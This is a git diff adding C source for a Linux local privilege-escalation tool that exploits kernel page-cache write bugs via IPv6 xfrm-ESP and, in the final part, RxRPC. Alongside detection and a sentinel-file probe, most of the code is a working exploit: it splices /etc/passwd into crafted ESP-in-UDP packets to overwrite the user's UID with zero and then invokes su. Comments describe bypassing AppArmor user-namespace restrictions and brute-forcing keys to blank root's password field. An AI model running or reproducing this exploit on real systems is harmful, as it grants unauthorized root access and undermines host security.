STORE empirically lands at splice_off + 9. The exact + * source of the +9 isn't fully understood (likely a frag-vs-linear + * accounting wrinkle in esp6_input's skb_to_sgvec), but it is consistent + * across runs at this kernel revision. + * + * We compensate by splicing from passwd_off - V6_STORE_SHIFT, so the + * STORE lands at the intended target offset. Re-test on different kernel + * versions; this constant may need recalibration. 
*/ +#define V6_STORE_SHIFT 9 + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp6_detect(void) +{ + log_step("Dirty Frag β€” IPv6 xfrm-ESP variant (CVE-2026-43284 v6 path) β€” detection"); + + int km = -1, kn = -1; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x", km, kn); + + bool esp6 = kmod_loaded("esp6"); + log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no"); + + bool userns = unprivileged_userns_allowed(); + log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); + + if (!userns) { + log_ok("v6 xfrm-ESP variant unreachable without unprivileged userns"); + log_hint("if you are on Ubuntu, try with --aa-bypass to defeat the restriction"); + return DF_PRECOND_FAIL; + } + + /* Quick AF_INET6 reachability probe. */ + int s = socket(AF_INET6, SOCK_DGRAM, 0); + if (s < 0) { + log_ok("AF_INET6 unavailable (%s) β€” v6 path not reachable", + strerror(errno)); + return DF_PRECOND_FAIL; + } + close(s); + + if (apparmor_userns_caps_blocked()) { + log_ok("LSM-mitigated β€” same hardening that blocks v4 also blocks v6 " + "(unprivileged userns has no caps)."); + return DF_PRECOND_FAIL; + } + + if (dirtyfail_active_probes) { + log_step("--active set: firing v6 ESP-in-UDP trigger against /tmp sentinel"); + df_result_t pr = dirtyfrag_esp6_active_probe(); + if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; + log_warn("active probe inconclusive β€” falling back to precondition verdict"); + } + + log_warn("VULNERABLE (preconditions met) β€” v6 xfrm SA registration available"); + log_warn("Apply mainline patch f4c50a4034e6 (covers both v4 and v6)"); + log_warn("Some distro backports may have shipped v4-only β€” test both paths"); + log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); + return DF_VULNERABLE; +} + +/* 
---------------------------------------------------------------- * + * Exploit + * ---------------------------------------------------------------- */ + +#ifdef __linux__ + +static bool wproc(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t n = write(fd, value, strlen(value)); + close(fd); + return n == (ssize_t)strlen(value); +} + +static bool xfrm6_register_sa(int nl, const unsigned char seq_hi[4]) +{ + char buf[2048] = {0}; + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + struct xfrm_usersa_info *usa = + (struct xfrm_usersa_info *)NLMSG_DATA(nlh); + + nlh->nlmsg_type = XFRM_MSG_NEWSA; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 1; + + /* IPv6 selectors / SA addresses. ::1 = {0,...,0,1}. */ + static const struct in6_addr loop6 = IN6ADDR_LOOPBACK_INIT; + memcpy(&usa->sel.daddr.a6, &loop6, 16); + memcpy(&usa->sel.saddr.a6, &loop6, 16); + usa->sel.family = AF_INET6; + usa->sel.prefixlen_d = 128; + usa->sel.prefixlen_s = 128; + + memcpy(&usa->id.daddr.a6, &loop6, 16); + usa->id.spi = htonl(ESP_SPI); + usa->id.proto = IPPROTO_ESP; + + memcpy(&usa->saddr.a6, &loop6, 16); + + usa->lft.soft_byte_limit = (uint64_t)-1; + usa->lft.hard_byte_limit = (uint64_t)-1; + usa->lft.soft_packet_limit = (uint64_t)-1; + usa->lft.hard_packet_limit = (uint64_t)-1; + + usa->reqid = 0x1234; + usa->family = AF_INET6; /* <-- v6 */ + usa->mode = XFRM_MODE_TRANSPORT; + usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */ + usa->flags = XFRM_STATE_ESN; + + size_t hdrlen = sizeof(*nlh) + sizeof(*usa); + size_t attrs = 0; + char *abuf = buf + hdrlen; + + /* + * Same authencesn-as-composition story as the v4 path β€” see the + * comment block in dirtyfrag_esp.c::xfrm_register_sa for why we + * register two separate attributes instead of XFRMA_ALG_AEAD. 
+ */ + { /* XFRMA_ALG_AUTH_TRUNC */ + struct xfrm_algo_auth *aa; + unsigned short dlen = sizeof(*aa) + 32; + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_AUTH_TRUNC; + r->rta_len = RTA_LENGTH(dlen); + aa = (struct xfrm_algo_auth *)RTA_DATA(r); + memset(aa, 0, dlen); + strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1); + aa->alg_key_len = 32 * 8; + aa->alg_trunc_len = 128; + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_ALG_CRYPT */ + struct xfrm_algo *ea; + unsigned short dlen = sizeof(*ea) + 16; + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_CRYPT; + r->rta_len = RTA_LENGTH(dlen); + ea = (struct xfrm_algo *)RTA_DATA(r); + memset(ea, 0, dlen); + strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1); + ea->alg_key_len = 16 * 8; + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_REPLAY_ESN_VAL β€” same primitive input as v4 */ + struct xfrm_replay_state_esn *esn; + unsigned short dlen = sizeof(*esn) + 4; + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_REPLAY_ESN_VAL; + r->rta_len = RTA_LENGTH(dlen); + esn = (struct xfrm_replay_state_esn *)RTA_DATA(r); + memset(esn, 0, dlen); + esn->bmp_len = 1; + esn->seq = 100; + memcpy(&esn->seq_hi, seq_hi, 4); + esn->replay_window = 32; + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_ENCAP β€” UDP/4500 */ + struct xfrm_encap_tmpl *enc; + unsigned short dlen = sizeof(*enc); + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ENCAP; + r->rta_len = RTA_LENGTH(dlen); + enc = (struct xfrm_encap_tmpl *)RTA_DATA(r); + memset(enc, 0, dlen); + enc->encap_type = UDP_ENCAP_ESPINUDP; + enc->encap_sport = htons(ENCAP_PORT); + enc->encap_dport = htons(ENCAP_PORT); + attrs += RTA_SPACE(dlen); + } + + nlh->nlmsg_len = hdrlen + attrs; + + struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK }; + if (sendto(nl, buf, nlh->nlmsg_len, 0, + (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0) + return false; + + char ack[4096]; + 
ssize_t n = recv(nl, ack, sizeof(ack), 0); + if (n < (ssize_t)sizeof(struct nlmsghdr)) return false; + struct nlmsghdr *r = (struct nlmsghdr *)ack; + if (r->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r); + if (e->error != 0) { + log_bad("XFRM_MSG_NEWSA(v6): %s", strerror(-e->error)); + return false; + } + } + return true; +} + +static bool bring_lo_up_v6(void) +{ + int s = socket(AF_INET6, SOCK_DGRAM, 0); + if (s < 0) return false; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + ifr.ifr_flags = IFF_UP | IFF_RUNNING; + int rc = ioctl(s, SIOCSIFFLAGS, &ifr); + close(s); + return rc == 0; +} + +/* Generalized v6 trigger: splice from `target_path` at `splice_off`, + * len 16 bytes. The STORE lands at file_offset (splice_off + shift) + * where `shift` is empirically determined per-kernel (see + * calibrate_v6_shift below). Use this directly if you already know + * the shift; for the production exploit path, callers go through + * trigger_store_v6() which compensates automatically. 
*/ +static bool trigger_store_v6_at(const char *target_path, loff_t splice_off) +{ + int udp_recv = socket(AF_INET6, SOCK_DGRAM, 0); + if (udp_recv < 0) return false; + struct sockaddr_in6 addr; + memset(&addr, 0, sizeof(addr)); + addr.sin6_family = AF_INET6; + addr.sin6_port = htons(ENCAP_PORT); + addr.sin6_addr = in6addr_loopback; + + int reuse = 1; + setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)); + if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("bind v6 udp_recv: %s", strerror(errno)); + close(udp_recv); return false; + } + int encap = UDP_ENCAP_ESPINUDP; + if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { + log_bad("UDP_ENCAP v6: %s", strerror(errno)); + close(udp_recv); return false; + } + + int udp_send = socket(AF_INET6, SOCK_DGRAM, 0); + if (udp_send < 0) { close(udp_recv); return false; } + if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("connect v6 udp_send: %s", strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + /* Wire ESP header (24B) β€” same as v4. */ + unsigned char wire_hdr[24]; + *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI); + *(uint32_t *)(wire_hdr + 4) = htonl(101); + memset(wire_hdr + 8, 0xCC, 16); + + /* v6 padding to clear the size gate. 
*/ + unsigned char pad[V6_PAD_BYTES] = {0}; + + int pfd = open(target_path, O_RDONLY); + if (pfd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + int p[2]; + if (pipe(p) < 0) { + log_bad("pipe: %s", strerror(errno)); + close(pfd); close(udp_recv); close(udp_send); return false; + } + + /* Compose: hdr(24) || target@off(16) || pad(V6_PAD_BYTES) */ + struct iovec iov_hdr = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) }; + if (vmsplice(p[1], &iov_hdr, 1, 0) != (ssize_t)sizeof(wire_hdr)) { + log_bad("vmsplice hdr: %s", strerror(errno)); + goto fail; + } + { + loff_t off = splice_off; + if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) { + log_bad("splice file->pipe: %s", strerror(errno)); + goto fail; + } + } + { + struct iovec iov_pad = { .iov_base = pad, .iov_len = V6_PAD_BYTES }; + if (vmsplice(p[1], &iov_pad, 1, 0) != V6_PAD_BYTES) { + log_bad("vmsplice pad: %s", strerror(errno)); + goto fail; + } + } + if (splice(p[0], NULL, udp_send, NULL, + 24 + 16 + V6_PAD_BYTES, SPLICE_F_MOVE) + != 24 + 16 + V6_PAD_BYTES) { + log_bad("splice pipe->udp v6: %s", strerror(errno)); + goto fail; + } + close(p[0]); close(p[1]); + + /* See the comment in dirtyfrag_esp.c::trigger_store on why we + * need to wait before tearing down sockets. */ + usleep(150 * 1000); + unsigned char drain[256]; + (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT); + + close(pfd); close(udp_recv); close(udp_send); + return true; + +fail: + close(p[0]); close(p[1]); + close(pfd); close(udp_recv); close(udp_send); + return false; +} + +/* Calibrate V6_STORE_SHIFT empirically against a sentinel file in /tmp. + * + * We fire the v6 trigger once with marker bytes "0000" spliced from + * sentinel offset 0, then re-read the sentinel and find where "0000" + * landed. The offset is the kernel's STORE shift for this build of + * esp6_input. 
Caller then splices from `uid_off - shift` for the real + * exploit so the STORE lands exactly at uid_off. + * + * Returns shift in [0, 64) on success, or -1 if the marker didn't land + * at all (kernel may be patched, or trigger setup failed). */ +static int calibrate_v6_shift(void) +{ + /* Build a 4 KiB sentinel filled with a recognizable pattern that + * cannot collide with our marker "0000". We use ASCII 'A' bytes. */ + char tmpl[] = "/tmp/dirtyfail-v6-cal.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("calibration: mkstemp: %s", strerror(errno)); return -1; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return -1; + } + close(sfd); + + /* Fault the page in. */ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return -1; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return -1; + } + close(rfd); + + /* Fire the trigger from sentinel offset 0. The trigger's wire + * packet carries seq_hi="0000" (MARKER), so the STORE writes those + * 4 bytes somewhere in the sentinel page. */ + bool ok = trigger_store_v6_at(tmpl, 0); + if (!ok) { + log_bad("calibration: v6 trigger failed"); + unlink(tmpl); + return -1; + } + + /* Re-read the sentinel via a fresh fd (page-cache view, not disk). */ + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return -1; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return -1; + + /* Search the first 64 bytes for the marker. We expect it to land + * within ~32 bytes of offset 0 based on prior empirical tests. 
*/ + for (int i = 0; i + 4 <= got; i++) { + if (memcmp(after + i, MARKER, 4) == 0) { + log_ok("v6 calibration: STORE landed at sentinel offset %d", i); + return i; + } + } + log_warn("v6 calibration: marker '%s' did not land in sentinel β€” " + "kernel may be patched, or trigger didn't fire", MARKER); + return -1; +} + +/* Production v6 trigger: calibrates the shift on first call, then + * splices from passwd_off - shift so the STORE lands at passwd_off. */ +static int g_v6_shift = -1; /* lazy-init by trigger_store_v6 */ + +static bool trigger_store_v6(off_t passwd_off) +{ + if (g_v6_shift < 0) { + g_v6_shift = calibrate_v6_shift(); + if (g_v6_shift < 0) { + log_warn("v6 calibration failed; falling back to hard-coded " + "V6_STORE_SHIFT=%d (may be wrong for this kernel)", + V6_STORE_SHIFT); + g_v6_shift = V6_STORE_SHIFT; + } + } + loff_t off = (passwd_off >= g_v6_shift) ? passwd_off - g_v6_shift : 0; + return trigger_store_v6_at("/etc/passwd", off); +} + +__attribute__((unused)) + +static int run_v6_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) +{ + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) { + log_bad("unshare v6: %s", strerror(errno)); + return 1; + } + wproc("/proc/self/setgroups", "deny"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_uid); + wproc("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_gid); + wproc("/proc/self/gid_map", m); + if (!bring_lo_up_v6()) { + log_bad("bring lo up (v6): %s", strerror(errno)); + return 1; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { log_bad("netlink xfrm: %s", strerror(errno)); return 1; } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("bind netlink: %s", strerror(errno)); + close(nl); return 1; + } + + if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return 1; + } + log_ok("v6 XFRM SA registered with seq_hi='%s'", 
MARKER); + + if (!trigger_store_v6(passwd_off)) { close(nl); return 1; } + log_ok("v6 ESP-in-UDP trigger fired"); + + close(nl); + return 0; +} + +#else +__attribute__((unused)) +static int run_v6_in_userns(off_t a, uid_t b, gid_t c) { + (void)a; (void)b; (void)c; return 1; +} +#endif + +/* INNER (bypass userns): SA reg + trigger only. */ +df_result_t dirtyfrag_esp6_exploit_inner(void) +{ +#ifdef __linux__ + const char *user = getenv("DIRTYFAIL_TARGET_USER"); + if (!user || !*user) { + log_bad("inner: DIRTYFAIL_TARGET_USER not set"); + return DF_TEST_ERROR; + } + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("inner: find_passwd_uid_field('%s') failed", user); + return DF_TEST_ERROR; + } + if (uid_len != 4) { + log_bad("inner: UID '%s' not 4 chars", uid_str); + return DF_TEST_ERROR; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { log_bad("inner: netlink xfrm: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("inner: bind netlink: %s", strerror(errno)); + close(nl); return DF_EXPLOIT_FAIL; + } + if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return DF_EXPLOIT_FAIL; + } + log_ok("inner: v6 XFRM SA registered with seq_hi='%s'", MARKER); + if (!trigger_store_v6(uid_off)) { close(nl); return DF_EXPLOIT_FAIL; } + log_ok("inner: v6 ESP-in-UDP trigger fired at uid_off=%lld", (long long)uid_off); + close(nl); + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +/* OUTER (init ns): prompts β†’ fork bypass child β†’ wait β†’ verify β†’ su. 
*/ +df_result_t dirtyfrag_esp6_exploit(bool do_shell) +{ + log_step("Dirty Frag (IPv6 xfrm-ESP) β€” exploit"); + + uid_t uid = getuid(); + if (uid == 0) { + log_warn("already root in init namespace β€” nothing to escalate"); + return DF_OK; + } + struct passwd *pw = getpwuid(uid); + if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; } + const char *user = pw->pw_name; + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("could not find %s in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd UID for %s: '%s' at offset %lld", + user, uid_str, (long long)uid_off); + if (uid_len != 4) { + log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len); + return DF_TEST_ERROR; + } + + log_warn("about to run xfrm-ESP6 page-cache write against /etc/passwd"); + log_warn("over ::1 with %d-byte padding to clear xfrm6_input size gate", + V6_PAD_BYTES); + if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; } + if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; } + + setenv("DIRTYFAIL_INNER_MODE", "esp6", 1); + setenv("DIRTYFAIL_TARGET_USER", user, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, MARKER, 4) != 0) { + log_bad("v6 write did not land β€” page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0 (via v6 path)", user); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache 
reverted (--no-shell)"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' in init namespace β€” enter your password for REAL root", user); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” used by `--scan --active`. + * + * Same shape as the v4 active probe: registers an SA in a fresh + * userns and fires the trigger against a sentinel /tmp file. The + * parent re-reads the sentinel and looks for the marker. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp6_active_probe_inner(void) +{ +#ifdef __linux__ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("active-probe v6: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + if (!bring_lo_up_v6()) { + log_bad("active-probe v6: bring lo up: %s", strerror(errno)); + return DF_TEST_ERROR; + } + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("active-probe v6: netlink xfrm: %s", strerror(errno)); + return DF_TEST_ERROR; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("active-probe v6: bind netlink: %s", strerror(errno)); + close(nl); return DF_TEST_ERROR; + } + if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return DF_TEST_ERROR; + } + /* Splice from sentinel offset 0; we don't need uid_off math here. 
*/ + if (!trigger_store_v6_at(sentinel, 0)) { + close(nl); return DF_TEST_ERROR; + } + close(nl); + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +df_result_t dirtyfrag_esp6_active_probe(void) +{ + char tmpl[] = "/tmp/dirtyfail-esp6-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("probe v6 mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "esp6-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("active-probe v6 inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + for (int i = 0; i + 4 <= got; i++) { + if (memcmp(after + i, MARKER, 4) == 0) { + log_warn("ACTIVE PROBE v6: STORE landed at offset %d β†’ kernel is VULNERABLE", i); + return DF_VULNERABLE; + } + } + log_ok("ACTIVE PROBE v6: page intact β€” kernel esp6 path appears patched"); + return DF_OK; +} diff --git a/modules/copy_fail_family/dirtyfrag_esp6.h b/modules/copy_fail_family/dirtyfrag_esp6.h new file mode 100644 index 0000000..0e1a1fb --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp6.h @@ -0,0 
+1,46 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp6.h + * + * IPv6 dual of the xfrm-ESP page-cache write (CVE-2026-43284). + * + * `esp6_input()` carries the same `if (!skb_has_frag_list(skb)) goto + * skip_cow` branch as `esp_input()`. The mainline patch + * f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 covers BOTH v4 and v6, + * but some distro backports may have shipped only the v4 fix β€” + * particularly when they cherry-picked the ipv4 patch in isolation. + * + * A vulnerable system in the wild may therefore be: + * - patched on v4, vulnerable on v6 + * - patched on v6, vulnerable on v4 + * - vulnerable on both + * + * This module is the v6 detector + exploit. Differences from the v4 + * path: + * - AF_INET6 sockets, ::1 source/dest, sockaddr_in6 + * - XFRM SA registered with family=AF_INET6 and 16-byte addresses + * - ESP packet padded to >= 48 bytes total to clear the + * `xfrm6_input.c` size gate (which v4 does not have) + */ + +#ifndef DIRTYFAIL_DIRTYFRAG_ESP6_H +#define DIRTYFAIL_DIRTYFRAG_ESP6_H + +#include "common.h" + +df_result_t dirtyfrag_esp6_detect(void); + +/* OUTER (init ns): prompts β†’ fork β†’ wait β†’ verify β†’ su. + * INNER (bypass userns): SA reg + trigger only. */ +df_result_t dirtyfrag_esp6_exploit(bool do_shell); +df_result_t dirtyfrag_esp6_exploit_inner(void); + +/* Active probe: fires the v6 ESP-in-UDP trigger against a /tmp sentinel + * file (never /etc/passwd) and reports whether the marker landed. + * Used by `--scan --active`. Returns DF_VULNERABLE on marker hit, DF_OK + * if the kernel is patched (no STORE), DF_PRECOND_FAIL if AA-blocked. + * The inner half runs in the bypass userns and reads + * DIRTYFAIL_PROBE_SENTINEL for the target path. 
*/ +df_result_t dirtyfrag_esp6_active_probe(void); +df_result_t dirtyfrag_esp6_active_probe_inner(void); + +#endif diff --git a/modules/copy_fail_family/dirtyfrag_rxrpc.c b/modules/copy_fail_family/dirtyfrag_rxrpc.c new file mode 100644 index 0000000..98f124e --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_rxrpc.c @@ -0,0 +1,1069 @@ +/* + * DIRTYFAIL β€” dirtyfrag_rxrpc.c β€” Dirty Frag RxRPC variant + * CVE-2026-43500 + * + * BACKGROUND + * ---------- + * `rxkad_verify_packet_1()` decrypts the first 8 bytes of an RxRPC + * data packet in-place via `pcbc(fcrypt)`. With `splice()` planting a + * page-cache page into the skb's frag, the in-place decrypt lands an + * 8-byte STORE on top of that page. + * + * The 8 STOREd bytes are `pcbc_decrypt(C, K)` where C is the existing + * 8 bytes at the file offset and K is an attacker-controlled 8-byte + * session key from an RxRPC v1 token registered via `add_key("rxrpc", + * ...)`. With a single block and IV = 0, pcbc reduces to a plain + * fcrypt_decrypt(C, K), which is a 56-bit-key cipher β€” small enough + * to brute-force in user space until the desired plaintext drops out. + * + * Unlike xfrm-ESP (CVE-2026-43284), this path needs no namespace + * privilege β€” `add_key`, `socket(AF_RXRPC)`, `socket(AF_ALG)`, and + * `splice` are all available to unprivileged users on a stock build + * with rxrpc.ko present (which Ubuntu ships by default). + * + * EXPLOIT TARGET + * -------------- + * /etc/passwd line 1 ("root:x:0:0:..."). Three 8-byte STOREs at + * offsets 4, 6, 8 with last-write-wins reshape chars 4..15 into + * "::0:0:GGGGGG:" β€” empty password field for root. PAM + * `pam_unix.so nullok` then accepts a missing password, su drops + * a root shell. 
+ * + * file off: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 + * original: r o o t : x : 0 : 0 : r o o t : + * final: r o o t : : 0 : 0 : G G G G G : + * + * Splice A @ 4 (8B): bytes 4..11 = P_A want P_A[0..1] = "::" + * Splice B @ 6 (8B): bytes 6..13 = P_B want P_B[0..1] = "0:" + * Splice C @ 8 (8B): bytes 8..15 = P_C want P_C[0..1] = "0:", + * P_C[2..6] βˆ‰ {':' '\\0' '\\n'}, + * P_C[7] = ":" + * + * Chained-ciphertext correction: by the time splice B runs, the page + * at offsets 6..11 has already been overwritten by splice A. So the + * ciphertext fcrypt sees for K_B is `P_A[2..7] || original_C[6..7]` + * (the last 2 bytes of the splice region are still original passwd + * bytes 12..13). Same logic for K_C against P_B. We compute these + * actual ciphertexts before each brute force. + * + * BRUTE-FORCE COST (single core, ~18 Mops/s): + * K_A: 2 fully-fixed bytes β‡’ ~2^16 iters β‡’ ~3 ms + * K_B: 2 fully-fixed bytes β‡’ ~2^16 iters β‡’ ~3 ms + * K_C: 3 fixed + 5 weak constraints β‡’ ~2^24 iters β‡’ ~1 s + */ + +#include "dirtyfrag_rxrpc.h" +#include "fcrypt.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#else +/* macOS analysis stubs only β€” real binary runs on Linux. 
*/ +#define IFNAMSIZ 16 +#define IFF_UP 0x01 +#define IFF_RUNNING 0x40 +#define SIOCGIFFLAGS 0x8913 +#define SIOCSIFFLAGS 0x8914 +#define KEY_SPEC_PROCESS_KEYRING (-2) +#define CLONE_NEWUSER 0x10000000 +#define CLONE_NEWNET 0x40000000 +#define SYS_unshare 0 +#define SYS_add_key 0 +struct ifreq { char ifr_name[IFNAMSIZ]; short ifr_flags; }; +typedef int loff_t; +__attribute__((unused)) +static inline ssize_t splice (int a, loff_t *b, int c, loff_t *d, + size_t e, unsigned f) { + (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; return -1; } +__attribute__((unused)) +static inline ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, + unsigned d) { + (void)a;(void)b;(void)c;(void)d; return -1; } +#endif + +/* ---------------------------------------------------------------- * + * RxRPC / rxkad / AF_ALG fallback constants + * + * may not be present on all distros. Define what we + * need locally so DIRTYFAIL compiles on any modern Linux toolchain. + * ---------------------------------------------------------------- */ + +#ifndef AF_RXRPC +#define AF_RXRPC 33 +#endif +#ifndef PF_RXRPC +#define PF_RXRPC AF_RXRPC +#endif +#ifndef SOL_RXRPC +#define SOL_RXRPC 272 +#endif +#ifndef RXRPC_SECURITY_KEY +#define RXRPC_SECURITY_KEY 1 +#define RXRPC_MIN_SECURITY_LEVEL 4 +#define RXRPC_USER_CALL_ID 1 +#define RXRPC_SECURITY_AUTH 1 +#endif + +/* RxRPC packet header (28 bytes, network byte order on the wire). 
*/
+struct rxrpc_wire_hdr {
+    uint32_t epoch;
+    uint32_t cid;
+    uint32_t callNumber;
+    uint32_t seq;
+    uint32_t serial;
+    uint8_t  type;
+    uint8_t  flags;
+    uint8_t  userStatus;
+    uint8_t  securityIndex;
+    uint16_t cksum; /* big-endian on wire */
+    uint16_t serviceId;
+} __attribute__((packed));
+
+#define RXRPC_PKT_DATA 1
+#define RXRPC_PKT_CHALLENGE 6
+#define RXRPC_LAST_PACKET 0x04
+#define RXRPC_CHANNELMASK 3
+#define RXRPC_CIDSHIFT 2
+
+struct rxkad_challenge_payload {
+    uint32_t version;
+    uint32_t nonce;
+    uint32_t min_level;
+    uint32_t __padding;
+} __attribute__((packed));
+
